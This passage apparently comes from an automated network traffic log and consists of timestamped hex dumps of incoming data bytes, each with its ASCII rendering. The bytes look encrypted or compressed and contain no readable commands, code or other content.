2022-05-30 12:45:08 UTC	113	IN	Data Raw: 16 53 e3 af c9 c3 90 19 0c 20 f5 be 97 24 3a a8 f9 87 61 4d d1 76 4c 27 0d 56 ca 9b 5c be 46 3b b7 46 f4 36 ee 71 9b 75 df c4 80 51 11 82 ed f9 61 dd ad e1 e0 14 8c 08 79 15 91 08 9a e5 63 d1 b8 48 25 4b ab 34 fe b7 c1 93 8a 43 a7 b3 32 6e 53 01 d1 63 a6 81 dd c5 40 13 2e be 73 c3 2a 1b 51 19 38 26 32 48 e2 2b dd 41 b1 12 97 cc 8b 3d 3b a4 d5 08 97 43 a2 14 0e 5a 82 bc 61 c9 79 79 34 93 ea ee 81 66 84 70 b6 da 60 53 32 ff cf f2 44 6a 1b fb e8 d9 42 63 3b 1e 50 ba 7a d7 ed 2e fe dd 44 8e da b0 61 2d 0f b3 f4 39 5c 44 23 a8 25 b4 1d 4d a6 84 fa cb f5 82 60 ed 44 17 41 dd db b3 72 ed 13 f4 c5 80 76 ef 1b 40 4f d6 bc 51 4b 40 f0 72 32 f3 1c 7a b2 39 cf 8f 7f 82 5e 63 37 32 32 fd f7 a9 91 3d 29 42 12 cf d4 a5 5a ad eb 76 df 1b b8 dc 0e eb 9a f7 23 28 2f 4b fd Data Ascii: S $:aMvL'V\F;F6quQaycH%K4C2nSc@.s*Q8&2H+A=;CZayy4fp`S2DjBc;Pz.Da-9\D#%M`DArv@OQK@r2z9^c722=)BZv#(/K
2022-05-30 12:45:08 UTC	115	IN	Data Raw: 90 be f2 17 54 f2 d8 5d 7a c2 0e f4 0c 68 61 e5 13 f5 bb 92 e4 f2 f2 df 46 f9 60 3e 7e 39 1b e4 7f ce fa 50 ef 66 cc 5e 4f b1 8f 0c da 7c 9c 4c ae 7e e2 c9 22 a7 27 72 9f df 96 18 c0 2e de 81 c7 f0 a7 a9 38 97 5c 37 c3 e8 72 b5 74 e9 5f 67 62 c5 f1 bc 5a 0f 77 46 0c 6f 27 da be 09 37 5a 9e b7 ee f5 73 d8 4a 09 ce f5 97 01 73 61 41 b5 b4 53 72 12 f0 79 52 27 cc df 3b da 3b 86 94 35 eb 73 68 91 1a cc 7e 49 25 83 98 a7 4e 45 89 e8 a8 5b 2a c1 49 cc 62 fd f7 fc db 2f b6 e7 0a a5 cf df a7 22 ed bc d5 e9 7f 37 57 d9 f5 3b 15 8a 67 e9 1c c1 b2 b1 4e 47 1c cd 43 a2 f9 66 f3 e1 b2 9d 89 b6 7f 3a d4 8f b4 b0 50 41 38 33 50 64 73 06 04 24 df b5 3a d5 7b 30 42 ef 6e 09 f6 33 03 37 b0 cd 1d d1 d5 31 ba fd a1 19 f6 1b 4f e9 2a 98 f2 54 c0 9a 1b 6c be 70 94 84 e0 b4 a4 Data Ascii: T]zhaF`>~9Pf^O\|L~"'r.8\7rt_gbZwFo'7ZsJsaASryR';;5sh~I%NE[Ib/"7W;gNGCf:PA83Pds$:{0Bn371OTlp
2022-05-30 12:45:08 UTC	116	IN	Data Raw: d4 83 01 86 18 1a 0b 34 fa 64 8e 05 58 ed 0a f3 06 2f ea 0a 9e 2d 7a 7f 64 01 41 b2 6c bb 88 45 d4 24 ba 58 c3 f4 ee 53 21 04 1f 28 e1 72 59 d3 32 d8 ff 14 be c0 85 98 21 97 79 2f 7f 99 9a 5b 0b 6e d0 b1 7a 29 d3 39 1f 0d f7 82 25 16 2c 52 c3 f5 77 6b 72 30 9a 45 e1 62 7c 47 33 3a 20 30 f9 d3 d0 6b bf fe fc 98 2f ff 39 76 78 10 d0 a0 60 11 44 da b3 f0 32 b8 f2 9a ee c8 4f f3 3e cb 52 e2 1c d9 e8 1e c0 68 77 0c 6e d5 ce 7c 8c f1 e9 87 33 42 0e 2f 31 ad b3 56 bd 3c 6e a2 28 53 7e c0 a6 70 05 de 93 d6 0c a7 90 05 4d 9a e2 98 10 f3 f6 66 70 18 dd 4e a4 ac e9 98 52 d2 a6 2d fd f8 c5 1c 15 e7 86 61 fa cb 61 99 3c f2 ea 40 c2 bb ba 80 0c e8 ee 6c e1 ef a6 c0 0d b2 0c bd 4f ce 94 2c 5f 85 bd 97 da 64 87 3a 3d e6 a3 78 4e b1 f9 2a 0f 43 88 46 60 e5 10 e0 a3 93 eb Data Ascii: 4dX/-zdAlE$XS!(rY2!y/[nz)9%,Rwkr0Eb\|G3: 0k/9vx`D2O>Rhwn\|3B/1V<n(S~pMfpNR-aa<@lO,_d:=xN*CF`
2022-05-30 12:45:08 UTC	117	IN	Data Raw: bc 28 ef 11 b8 30 c5 f8 f8 7c 16 a4 aa db b8 2e 3c ca 40 a1 3b bf c9 c8 bb b3 b6 3b 98 22 b9 0e d9 b8 a5 ae 2b dd 0b 61 fa a4 88 44 63 df 23 97 29 d2 67 f4 fd 24 48 38 aa ad b7 9a 85 07 53 af bd fd ab bb d0 e7 c3 cb 54 aa 93 5a d7 1e b0 fa 54 62 20 cb de b4 0f eb b1 3c 28 32 a5 89 bf c7 8e f8 b1 61 2d 03 a2 b2 3b 5c 44 59 5c 29 13 1f 4c a6 d4 97 93 51 44 1c 17 a4 13 b0 05 fe 24 29 42 03 c4 ba 2a 2e 64 57 60 fd 62 27 24 69 fe c5 cb c9 8c 16 1e b1 e0 e5 05 36 fa 8d f7 55 df cd 77 a9 23 ef 2a c7 bc 97 0f e8 17 ed 1f d3 76 ff 95 47 c2 09 e9 9a a2 a1 e9 9c 58 3b 24 ac 12 06 24 82 a1 8f f1 6c ee e5 b7 09 20 45 d1 99 02 38 ac b6 b1 b9 fa 97 f9 58 3a c9 b6 b9 ca 8d 05 38 59 cf c1 12 e3 55 d1 a1 60 4b 00 02 20 86 18 ac 86 5a 56 22 bc e8 0f 13 c1 f2 41 d4 9e 3b 14 Data Ascii: (0\|.<@;;"+aDc#)g$H8STZTb <(2a-;\DY\)LQD$)B.dW`b'$i6Uw#vGX;$$l E8X:8YU`K ZV"A;
2022-05-30 12:45:08 UTC	118	IN	Data Raw: a7 e5 f9 ba 45 c3 e8 7b bd 2a f1 d8 3b 63 4e 3f 5b d0 5a dc c6 0c 3c 77 bf f8 4e c8 a5 15 1a 3d d9 b0 00 b4 06 c8 76 9f 82 0f 4a da 3b e1 49 8d 66 85 b9 c5 76 3d 75 50 36 47 03 54 c2 36 f4 23 b9 c4 93 a4 b7 a0 43 67 c5 e0 5e 30 00 d3 d7 f5 d5 46 49 dd 49 b2 fc 65 b5 10 ea 13 f6 27 48 d5 63 69 6b 42 2a 70 b2 23 c0 fa 8c 0e 1d f5 e9 1c 4a 95 f7 47 b9 e3 b7 3e 2e 5f 12 f2 e4 c1 0e 89 b6 f4 9e 3c 51 61 f8 ea c4 75 14 75 3b 2c 50 4b 26 df 36 ae 31 9a 2a b2 95 22 cd f2 b6 46 bc 8e 46 32 b9 3e cc 37 7e 12 c2 f9 ac 44 90 68 71 82 21 f5 4e 56 22 ca 7e 9b 33 24 4d 28 50 a6 2b 13 05 22 a8 08 8e 7a 72 47 dc 0d 32 6f 72 9b 75 b6 bd 6d 44 ff 7c 12 06 07 07 bd 1f 1f 14 d9 3e b0 41 e8 5f 73 32 58 22 c4 b5 ff 13 54 be 15 47 31 f4 5d ed d3 3c 99 fa c5 89 2e 6c a1 72 2e bf Data Ascii: E{;cN?[Z<wN=vJ;Ifv=uP6GT6#Cg^0FIIe'HcikBp#JG>._<Qauu;,PK&61*"FF2>7~Dhq!NV"~3$M(P+"zrG2orumD\|>A_s2X"TG1]<.lr.
2022-05-30 12:45:08 UTC	120	IN	Data Raw: c8 6a 9a 2d c6 60 36 2c f8 2c 9d f2 ce 34 cb c2 8c be 39 94 43 cb 32 cd ff 6a b1 d1 e4 8a 28 54 60 14 ff fc 98 fe 6f f8 77 78 95 9b b9 52 86 cd d4 5f f0 32 31 01 48 8d 52 2f 0c c1 42 8b 44 f4 f7 d9 9a 00 4e 00 f2 27 e2 44 85 3b 27 e1 78 cc 81 10 a3 23 ae b3 d5 43 32 e5 cc 32 53 7e 07 e3 0d cd ab 95 1d a1 a7 90 c9 4e fe ba 64 11 f3 7d 51 44 90 9c 3e 94 d2 89 5a d7 1b e8 d6 4a 25 9a e3 ea 24 b3 b3 05 36 9e 10 33 1a 62 01 b6 61 cf c0 cf b9 ef 38 da 3b 4e 72 88 78 f3 12 a7 79 4a d4 2e cc e2 ee 13 99 78 bf ad 7b 4e 35 27 a2 7a ee 0b 7e 48 b2 67 0d 3e 2d 53 93 00 73 99 5d 4d f9 d8 66 50 4d 26 54 2e 9b a9 06 e0 19 55 87 18 34 0c 6a c8 fc 1d b3 14 15 13 13 c9 58 de df 1b d9 66 1c c0 2e d0 de 63 bb 27 17 39 11 48 35 c1 9d 25 80 b7 00 a2 98 89 16 ba f8 a8 e0 9f 20 Data Ascii: j-`6,,49C2j(T`owxR_21HR/BDN'D;'x#C22S~Nd}QD>ZJ%$63ba8;NrxyJ.x{N5'z~Hg>-Ss]MfPM&T.U4jXf.c'9H5%
2022-05-30 12:45:08 UTC	121	IN	Data Raw: 93 2c 23 9e 90 54 aa cb 12 5e cc 5f 88 97 ea d9 42 8a e4 01 d1 c6 e6 e3 cb 2c fe bb 38 1d c7 04 24 59 ed a1 24 42 5a 7d 12 cf b2 40 18 f7 c0 7a 80 f4 b2 72 a2 11 bb 18 b0 5f 8b 38 a2 8f 83 26 be 7c 2f 64 97 8c 73 cf be 50 7a c7 c2 a8 5d 0f f7 61 4d 62 08 9f c8 05 f1 62 08 c6 cd 02 2a d0 5b de ef 31 b3 9f d8 e1 ab 52 b3 a4 63 be 44 c3 08 e9 da 82 26 5b 3c 6f cf 63 88 00 02 dd 1d d3 dd 91 b8 ff e5 e7 81 23 20 66 40 eb 2f 40 a5 41 c3 b7 21 7e 78 d0 19 2b e9 22 29 2d 42 59 30 87 8d 29 20 fe dd 4d 6e 84 d0 54 5b d7 cf b6 e9 99 70 3e 94 2b 46 f7 06 b5 5c af 2e 86 1d c3 90 10 30 63 27 4b 44 7f c1 f0 2b 3f a0 c2 f5 9a 7a 65 7e c4 43 95 75 64 92 8b 33 8b e5 89 a6 03 8a 22 1e 3e 36 fa 99 f8 6a 08 6e 59 92 f5 6c 5b 7e 94 39 68 a5 14 15 3c 26 5c 5a 37 f9 09 eb 9b 86 Data Ascii: ,#T^_B,8$Y$BZ}@zr_8&\|/dsPz]aMbb*[1RcD&[<oc# f@/@A!~x+")-BY0) MnT[p>+F\.0c'KD+?ze~Cud3">6jnYl[~9h<&\Z7
2022-05-30 12:45:08 UTC	122	IN	Data Raw: 81 b6 2b cf c8 41 c7 46 b5 76 53 d7 16 d5 46 3c e2 7e b8 a2 ea d5 a2 0b 1c 4e 52 0a a5 63 30 b9 0f 02 73 8a 22 c1 0c cb de 9c 10 fc 13 fd 33 3f 21 3c 2a 4a cf 55 c3 50 c7 a8 3f 9b 32 d0 0a 0b c3 8c e2 6b 67 c4 f8 47 fd ac b1 80 24 a3 04 ba ee ae 1f ea bd 93 51 e9 b6 b2 c3 43 84 b6 a0 c4 7d 17 fe f9 92 c2 f9 d9 e5 48 67 c8 77 16 7e 94 50 ad fe 31 e0 9b ea 19 81 2b f5 60 9e ae cb 94 3c 56 29 7a 3d a8 26 f3 f6 72 9b 9d a8 b1 e0 ef ec b8 1e 8d 52 0f d6 f4 7f 97 30 4a 1c 55 b5 5e 72 c4 d6 a3 08 89 33 10 ce cb 01 33 01 f4 69 ed a7 46 e8 3a 25 ba 0a 48 a9 79 af 7e 9b b4 18 51 33 93 a7 5f 7a a5 42 54 89 93 29 3f 74 53 44 b2 f4 dd 47 02 e4 98 4c ba 17 7b 71 3d 62 be 44 07 b3 54 6a fe ea 6d 10 a9 cc 58 3b 64 b5 13 dc f3 76 33 7d 1f 4f e3 c6 fb b1 86 1c d7 cb 9e 94 Data Ascii: +AFvSF<~NRc0s"3?!<*JUP?2kgG$QC}Hgw~P1+`<V)z=&rR0JU^r33iF:%Hy~Q3_zBT)?tSDGL{q=bDTjmX;dv3}O
2022-05-30 12:45:08 UTC	124	IN	Data Raw: 08 f9 9c ce 5d d4 b2 47 93 ff fb da f0 17 73 45 72 ff 38 5b 6b f9 ac 48 ad 9a 0a 0d d6 c9 59 dc e7 a1 c1 98 84 35 be b3 7b c8 41 99 7d 89 3e 19 8c b1 d2 1a 21 5b aa 2d 62 53 36 6a ee f9 48 24 6b b9 e9 65 cf 9b b7 da 21 06 c2 d7 c6 f4 06 1e 24 e4 c8 4c 4a 41 cb 59 0f 05 57 05 0a f0 66 c3 04 05 32 ca 87 ca f5 7b f0 0b 27 a2 7a ee 13 70 6d 9b a3 b3 98 87 d6 65 9e 71 c9 8e b9 06 27 b3 43 46 5a 25 ec ca fa 50 1f f3 5e e3 df b2 fa 1e b0 0c d4 4a ee c6 6e 37 dd b0 86 27 90 57 28 9a e8 2f 55 17 17 70 19 80 b4 11 48 35 b7 fa af b6 8e ff 5d 67 8a 47 aa 31 dc 11 f1 6f 0d 3c 77 32 fb 58 e2 a4 15 4f 6d 45 6d d0 3b 52 4a b2 93 e9 9d fa f6 3b 52 d7 58 13 a1 91 94 ce f3 60 e6 dd 6a 88 b8 10 94 3f e3 85 c8 12 e7 3d e5 bf 67 4c 99 85 0d fe 23 53 16 b3 7d 81 a6 fa 91 77 29 Data Ascii: ]GsEr8[kHY5{A}>![-bS6jH$ke!$LJAYWf2{'zpmeq'CFZ%P^Jn7'W(/UpH5]gG1o<w2XOmEm;RJ;RX`j?=gL#S}w)
2022-05-30 12:45:08 UTC	125	IN	Data Raw: 9b a8 9b 9c b9 f4 2b 03 f5 14 64 81 1d f7 61 68 ed 73 71 03 77 43 77 99 24 31 fd 51 49 aa 03 a3 85 c6 f0 ae 1d 20 e8 cd 59 bd 72 1e 3b f7 16 11 07 75 f4 3d bd 89 7f 0b 7d fa a9 bc 56 c2 f8 b4 15 23 ee 0b ee 43 43 56 04 5b 8d 61 a6 67 08 df 81 21 bd 09 c3 ea 11 62 95 99 2d a0 d0 f5 78 24 00 57 ae c8 c1 f4 50 b6 10 eb 81 8b c6 f4 47 ea 7b 6d 77 88 be a3 ed b2 e8 6a 7b 7f 58 ff 03 1f c6 25 0a 45 d6 9c fc 63 48 b0 ca 6a d2 fb 95 f7 1e 74 ef d1 47 27 8a 61 6b 37 01 02 60 96 f2 6a 54 15 1a 18 09 6a 56 a9 8b 4e 92 5f 9e bb 07 a6 19 14 48 2c e8 1b 49 75 35 b9 e1 7a 6b af 1e bd 1c 38 20 b3 89 d0 55 6f bd fd fc 98 9e 13 c8 fd 3c 34 53 aa c7 0d 49 6f 9f 33 b1 54 75 d7 62 f8 a3 0c 92 17 82 91 ec 53 a4 bf 20 46 d5 cb 29 2d ba 9b e5 ff 1d e1 ba 06 dc bb a3 57 b2 59 3e Data Ascii: +dahsqwCw$1QI Yr;u=}V#CCV[ag!b-x$WPG{mwj{X%EcHjtG'ak7`jTjVN_H,Iu5zk8 Uo<4SIo3TubS F)-WY>
2022-05-30 12:45:08 UTC	126	IN	Data Raw: f8 e9 c6 a8 ca 93 5b c5 80 24 76 88 5d 39 02 1e ea 36 53 e9 46 25 3d 08 4c 36 82 a8 17 29 77 45 02 6d 49 ba a8 4a 07 38 fe 79 9f 08 ee 8d b2 3d f1 96 df a2 cd d9 27 ce a0 48 03 9d 10 8a 05 93 5e c5 a4 ba 49 0d 8d 70 04 8f d7 6b b3 4b 68 74 85 71 80 67 40 e9 d7 8d 1b 02 dc e1 7a 6b 3a 52 c6 fa 65 24 c0 df b7 25 a0 c6 16 77 b3 ef fd 4f d3 ae f1 99 af 19 77 57 01 34 dc b5 22 85 82 28 1a 2b ac 78 fd 95 d1 e0 16 fb 71 5b 02 d2 8c c9 e2 59 65 bc 8e 92 65 a4 70 96 95 7c 43 97 1e 35 92 8b ad ee 56 a8 13 ad 04 74 76 27 29 91 24 1a 42 5f 08 a9 bb 51 27 bd 75 cb 40 0e e7 01 52 04 5b f8 03 1e f6 37 4c a2 7c d9 4e e9 60 b4 60 a0 14 51 6a 44 8f c0 0f fe 43 82 bb e3 f2 e3 d7 37 06 dc b3 53 63 8c 8c 72 7c 2f 64 bf 69 db 12 80 2a de 78 06 8f cd 0c a7 ec bf 22 b0 04 36 aa Data Ascii: [$v]96SF%=L6)wEmIJ8y='H^IpkKhtqg@zk:Re$%wOwW4"(+xq[Yeep\|C5Vtv')$B_Q'u@R[7L\|N``QjDC7Scr\|/di*x"6
2022-05-30 12:45:08 UTC	127	IN	Data Raw: 34 ea 4b dc 81 e2 4f 75 85 0c d4 28 fc 8d 6a 6d c7 b1 f9 77 96 1c b5 52 47 55 16 d9 c0 01 4b 27 12 14 9b e1 f5 f4 bc c0 b5 41 8d f0 04 77 b1 78 66 d6 74 ac e4 ff 10 fa 20 cf 95 fc c9 8f 71 23 0e a9 ee e6 00 83 ea e4 5c 4f 3a be 3a ac fa 02 cb 06 95 17 2f bb d1 de 96 8c dc 82 38 dc a5 9b 9e 5b d4 b7 2c 43 64 c5 be 97 cc 36 b8 11 ff 28 6f ef 03 c1 d9 b0 70 88 b9 6a b7 b0 6d 26 b8 93 fc 4c 8c ee dd 43 e5 b1 07 4b b2 c0 54 25 e5 04 b0 7d 06 14 2b a7 e5 9e 45 99 de 47 e1 d6 0d 55 41 f2 10 63 f3 cb 16 0a 23 24 43 ec a9 4f be e4 72 90 77 0a 3d ff c3 d2 fe ae 79 28 e9 f5 8f 1c a6 cf 20 d2 6f e2 25 4a a6 5b 2b dd b6 f2 73 f4 9a 8d 0e 8d 4a 7c d2 9f 3a 27 3e 4d 81 09 80 03 1f 4a 15 df b2 79 b8 18 1d 86 91 20 c4 f8 1e 90 ab b0 95 9f 8c 21 4a 95 b0 53 ce a5 f8 77 47 Data Ascii: 4KOu(jmwRGUK'Awxft q#\O::/8[,Cd6(opjm&LCKT%}+EGUAc#$COrw=y( o%J[+sJ\|:'>MJy !JSwG
2022-05-30 12:45:08 UTC	129	IN	Data Raw: 51 10 37 7a 54 d5 d0 c5 65 c5 93 7e ef 96 fd c6 36 49 6c e2 d6 3c 4c e2 61 ad bb b4 fa 15 a9 f0 67 9d 81 04 5b 5c e4 35 90 36 b6 40 17 f0 3f ae 49 7e d8 6e 32 61 6b 7b 0b cf 50 53 be 10 37 36 7c 8e a3 48 1a 49 3b 06 1d 13 05 1f 5c 4d f0 bf 6e a3 41 89 ce 83 35 03 8a 44 1e d6 ca 71 1d dc b1 54 52 5f 6a dd 4e 50 45 bb 93 ee 8e a0 e8 c2 d9 2b 90 69 57 a9 44 d2 6d e1 ce 6b c3 b7 6e 04 97 8a 1d 37 ba 62 00 03 1d d6 5e 4d 19 87 ef a4 47 10 29 6f d7 90 18 ce 45 86 ab 83 1c a8 89 9d bd 2b e5 96 16 00 b1 01 11 5e b4 62 5e 2d 08 d7 50 3a 0c fc 11 ab fa cb f4 b3 56 bb b0 2e 44 a3 8b f5 c4 cb 8d bc a8 6d 5a 0d 07 31 6b d6 f0 ff 94 d3 a0 2b 8f df e8 56 94 cd 32 90 71 9f 2b 9d d0 79 8e e0 e3 60 e2 54 b1 5d df b8 7a 9a 60 eb 17 2a ec 36 81 0c 6b a1 b5 ac b1 51 99 0e 39 Data Ascii: Q7zTe~6Il<Lag[\56@?I~n2ak{PS76\|HI;\MnA5DqTR_jNPE+iWDmkn7b^MG)oE+^b^-P:V.DmZ1k+V2q+y`T]z`*6kQ9
2022-05-30 12:45:08 UTC	129	IN	Data Raw: 0f 5b 98 ae 6c 24 98 1f d8 4a 8c 2c f1 5b 1f 2f 24 fc 6f e1 e9 dc 24 12 23 f4 56 f9 b4 c3 37 37 07 8e 29 c7 00 6e 14 d0 c5 e6 0a 62 e5 24 f5 7e bb 31 ae 96 79 ad 51 77 a6 45 8d b5 00 d4 7e 0e d0 58 06 38 54 df 17 4b 82 60 de f7 55 e9 00 e2 60 72 b8 d7 a3 89 76 95 6d 0e 9b 74 47 b0 8c 47 61 20 3f 50 c3 c6 c3 b0 ca 7e 05 85 63 3f 9e 01 71 53 4f cf 01 15 a8 b5 eb 89 c9 f8 f2 60 74 f5 1a ab f4 91 b2 c0 09 66 d7 d1 d3 58 13 7e ce c3 bf ce f7 69 6b f0 65 c7 6b b9 17 84 95 48 19 b9 c8 b5 75 c4 5c 06 9d 8a be 13 58 55 43 a5 90 a8 ad 33 bb 6b 4a 18 7b e0 d9 95 f2 1a 02 34 a4 ff 3e bd 3f bb 96 97 ec 16 44 35 4e 61 28 f8 d9 57 6c 8b e1 de d8 4d 75 ed 07 be 39 85 eb db be a5 d7 ac fd c3 24 03 ec 55 c7 81 e6 d3 23 12 91 7c 8d 5f 1f 58 ad 53 00 3d c5 c6 a3 03 43 dd 76 Data Ascii: [l$J,[/$o$#V77)nb$~1yQwE~X8TK`U`rvmtGGa ?P~c?qSO`tfX~ikekHu\XUC3kJ{4>?D5Na(WlMu9$U#\|_XS=Cv
2022-05-30 12:45:08 UTC	131	IN	Data Raw: 87 0d 21 b4 36 a1 c5 0e 74 81 40 b5 7f 14 d9 fb 7e 9e b2 20 c3 c9 24 54 54 ca 9b f5 db 8e c3 f6 fa fd 48 79 bc 73 2e 3a 4e 1f 64 29 78 21 cf e0 83 4a 79 26 5c 8e 1b 46 3b b8 07 9b eb 78 d1 b8 c6 6c ef df 01 22 6f 84 39 76 b3 ee 76 c1 e6 a3 55 fe e4 66 bb d6 b1 71 78 5b a4 8c 3c af db 2b 83 78 f2 94 5f 58 8b 06 e8 6f 4d 74 03 65 48 cf a6 5a 3a dc d1 b0 f0 e3 aa d6 93 1f 0c 68 8e 3b 24 69 76 fd 98 7b df 51 2a 0a 28 91 58 5d 82 ca 23 d9 3f 83 ea 1b 62 6f fc af 45 cd 60 1d a5 34 98 9a c8 21 b0 0b 01 84 92 a0 37 a8 4b fd 3b 26 77 10 b8 ff 6c 9e e8 7e 44 ec 23 b0 9c ff e6 5d f9 4b 06 08 b4 7e 72 db 6b fc b4 ff a9 72 d1 e2 70 d6 8f cd 0c 72 a8 4d 73 3e 41 ca aa 64 8a fc 92 39 ea 16 e9 d0 3c 8f e4 1c c7 5e 28 de 55 2c 0f 1b 71 c3 f3 c1 62 9c 72 ec d9 9d c0 7d c4 Data Ascii: !6t@~ $TTHys.:Nd)x!Jy&\F;xl"o9vvUfqx[<+x_XoMteHZ:h;$iv{Q*(X]#?boE`4!7K;&wl~D#]K~rkrprMs>Ad9<^(U,qbr}
2022-05-30 12:45:08 UTC	132	IN	Data Raw: 36 a9 b7 63 c0 27 d4 95 0e 2f 70 79 46 9b e4 67 7f d3 68 e6 02 75 ef 86 12 da 5d 81 f4 2d 85 a9 ee de d8 27 cc ee d8 b9 be 7e ec b3 79 c6 42 b2 99 eb dd de 58 a2 36 50 23 e4 25 bc 0a 61 18 93 2c a4 a9 b5 77 c3 71 e7 c4 44 03 02 f1 de c6 61 4e 3f 3e 6b 1a 78 f1 e4 b7 b2 19 ba 65 30 a1 1a c3 ea 32 7f 5d b6 cc c6 e6 b7 15 9b 1c 63 c4 6b da 36 36 81 1c c0 d9 2b a3 78 1c 30 b4 9c 42 be dc ba f0 8f 32 a1 5e f7 d6 13 56 4f 02 91 df 5f 93 14 5c 02 6d f2 f1 40 2c 63 a2 54 79 13 11 0f dc 67 58 ac 3d 40 a8 7c 37 22 ce 4d c8 a7 8a e6 11 30 45 fb d4 45 b9 e3 3d 4c 16 7e 99 fc ea ba 95 86 31 bd f5 3c 01 61 cb 02 c4 f8 47 96 83 c4 8f a0 3a de b5 6a be f7 eb b2 94 07 cd f2 b6 8b c0 69 c3 a5 c3 79 33 ba fd 11 2a f8 a3 4d 4b 28 98 f2 5c e2 b0 a7 81 3d d9 91 8b e4 80 a7 03 Data Ascii: 6c'/pyFghu]-'~yBX6P#%a,wqDaN?>kxe02]ck66+x0B2^VO_\m@,cTygX=@\|7"M0EE=L~1<aG:jiy3*MK(\=
2022-05-30 12:45:08 UTC	133	IN	Data Raw: f3 55 d0 10 2f 8e ed ad 7d 36 b5 2b eb b2 da 30 8b de a2 d8 97 42 d3 64 01 67 6b 2a af ab 44 d4 24 69 a8 4f b1 46 e5 a3 d2 63 13 99 76 97 e4 b9 db 57 37 fd c9 76 86 ca 07 d4 2e 70 9e 18 4e 86 23 f1 94 54 c0 9d a9 60 4c b3 df 7e 9d d9 7b 17 48 b6 9f 0c 23 8b 85 94 6c 17 41 1c 3e 76 e4 8a 28 54 1f e9 90 77 0e 92 51 c9 76 29 9d d6 a0 bb f2 b4 b4 20 02 32 b8 20 d1 c6 a9 fa 5c f2 90 59 97 71 26 17 64 e8 69 a7 31 a2 72 b4 43 f6 3e 93 d2 ef cf 75 c5 dc 51 4c be fb c9 ea 48 ad 93 0b 3f a0 36 25 dc 93 a5 f6 2c 68 8e 37 8d c4 67 fb db 17 de 3e 39 87 1c 2a 57 15 c9 38 d5 f5 8c d0 30 65 4d 44 b5 c1 47 09 bf 51 f8 48 f4 14 bf 41 96 2b 6b 09 50 7d 46 35 c7 11 2c 80 57 51 f5 14 a9 72 f4 5a f0 a3 e4 f1 18 04 9b b9 97 f4 1d 8f d4 bd 0e 03 70 76 b3 43 8f 33 28 39 95 b4 4f Data Ascii: U/}6+0BdgkD$iOFcvW7v.pN#T`L~{H#lA>v(TwQv) 2 \Yq&di1rC>uQLH?6%,h7g>9W80eMDGQHA+kP}F5,WQrZpvC3(9O
2022-05-30 12:45:08 UTC	134	IN	Data Raw: d1 0b 0e 3d c9 d0 75 bc 57 85 4a 36 ae fe 2e 6f da 35 5e 1e ab 90 e5 04 7c 75 ac 35 5c 9d 12 54 99 93 71 05 f9 47 0a f8 cc 74 8e 2d 18 ea f5 35 d0 b0 a4 f2 a0 23 5b 41 97 48 ee b4 64 7b 6a ad 00 67 f8 4b a1 1b 50 a2 25 d4 2e 00 69 e1 ac 03 ea 21 c7 67 e4 2e 5f 0c 44 f9 cf 2e fe 36 19 2d d0 d9 61 7d e1 26 8c c6 7d 02 56 66 e8 0f 1e 9b f6 8b c8 8d a7 b9 e3 94 eb d9 65 2d cd c3 5d fa 84 c6 22 fa ef 11 5a 37 fa b9 5b 39 e2 30 a6 c3 0c f3 08 38 66 36 ee 5f b7 3e e2 8b 71 c7 0e f4 6d 11 5b cd 5b eb 9b 84 15 09 58 dd 58 ad 62 5a b4 22 fe 2a 98 f8 a8 61 46 b4 02 ed de 3c 8d 67 20 4d b5 4a b7 14 50 19 f5 11 3e 46 bc 60 de 48 33 42 cd 3b c8 1c 83 c7 36 33 29 57 15 23 04 a4 4a 09 97 06 21 fe af f2 7f 0e 1e bc ae 68 14 7d 89 54 8a 42 17 84 2a d3 76 ee 5c da 87 d8 90 Data Ascii: =uWJ6.o5^\|u5\TqGt-5#[AHd{jgKP%.i!g._D.6-a}&}Vfe-]"Z7[908f6_>qm[[XXbZ"aF<g MJP>F`H3B;63)W#J!h}TBv\
2022-05-30 12:45:08 UTC	136	IN	Data Raw: c9 35 5c bf 87 cc 12 b0 ee c9 a2 23 46 5a b4 65 f8 cf b1 c3 2d 3f 77 32 7f b7 99 2e d3 c4 a0 61 80 29 91 2e 48 40 c5 8a a5 86 fe c6 6b ae f1 d6 b5 1a 4c 76 7f 04 a8 9b e4 c5 d1 60 f1 f8 a6 79 c4 52 58 3d 63 a8 e9 11 97 b9 4a 00 83 0d 4b 8e c5 8d c2 3d a2 77 04 65 9c 45 4f 95 0f 52 f0 bf 3f 65 4c 1b f7 72 de a7 73 c9 7e 16 20 16 f4 a1 d3 a6 b8 3c 23 47 a9 da c2 b7 fe 69 42 9a 04 cb 28 fb 79 f9 e4 c9 9e c6 f8 47 90 94 b1 8b a0 e6 ab b2 d2 6e e0 15 42 fb d2 9c 9a 48 c3 43 81 93 a5 f1 19 62 31 2e 1f 8f 05 44 41 38 d7 67 71 1b 1a 3a 1d 3c 37 bf 6b 7b e4 8d d0 1f ac a4 90 00 36 10 b6 66 f4 bd 3d e3 5b 32 32 07 90 26 57 66 6b 21 87 03 84 f9 75 dd 4a 41 44 9f 69 33 9b 00 e6 0b 25 3a 6d 79 cc 8f df ba 94 be 0a 00 c8 2e 8a 43 07 6c 91 49 f5 3d 48 e7 22 d0 a1 fa 98 Data Ascii: 5\#FZe-?w2.a).H@kLv`yRX=cJK=weEOR?eLrs~ <#GiB(yGnBHCb1.DA8gq:<7k{6f=[22&Wfk!uJADi3%:my.ClI=H"
2022-05-30 12:45:08 UTC	137	IN	Data Raw: d5 a1 97 1d 8f 38 15 0a 0b 65 3b 9e 6c e3 c2 8c 66 97 92 89 bc e1 c0 18 24 d2 44 32 fe 2d 54 a2 b8 e7 71 c5 14 5e 7e b7 53 d5 58 0f 7f 49 6f 40 28 29 b9 ec 5d 44 6c dc cd 04 90 cf c0 09 96 16 00 d5 eb ee a1 b2 66 27 b4 43 f6 6a 95 cb 17 5a f7 1e ea ad 78 df b5 b8 6d 40 2b 53 7e 04 e1 01 02 ed 53 63 75 41 6c 36 8d 77 64 c6 4d a8 24 1b d5 f5 b1 4f a7 12 9a cc 04 85 16 6c d6 f6 64 1c 15 6a 7a 16 25 5c c6 11 ba 0a 81 40 92 d9 10 0b fd 61 31 9d ea d0 e4 6a 0a b2 87 39 14 81 56 2a a0 e7 d1 6e 33 9b f3 7e d6 50 3f c8 1d 2b f3 92 b7 05 77 39 89 e3 12 76 53 18 af 52 65 d2 f0 f5 d9 12 87 4d 25 86 fa e1 39 53 a9 61 92 79 53 8a 3f 69 6c f9 78 d9 63 96 6f 3e ae 5d c4 37 59 22 20 1f 0a a5 94 9e 18 9a a5 82 76 4b 4b f7 f8 2d 55 85 e9 b2 79 73 ef 1a 1b 2d 34 54 f7 b9 f3 Data Ascii: 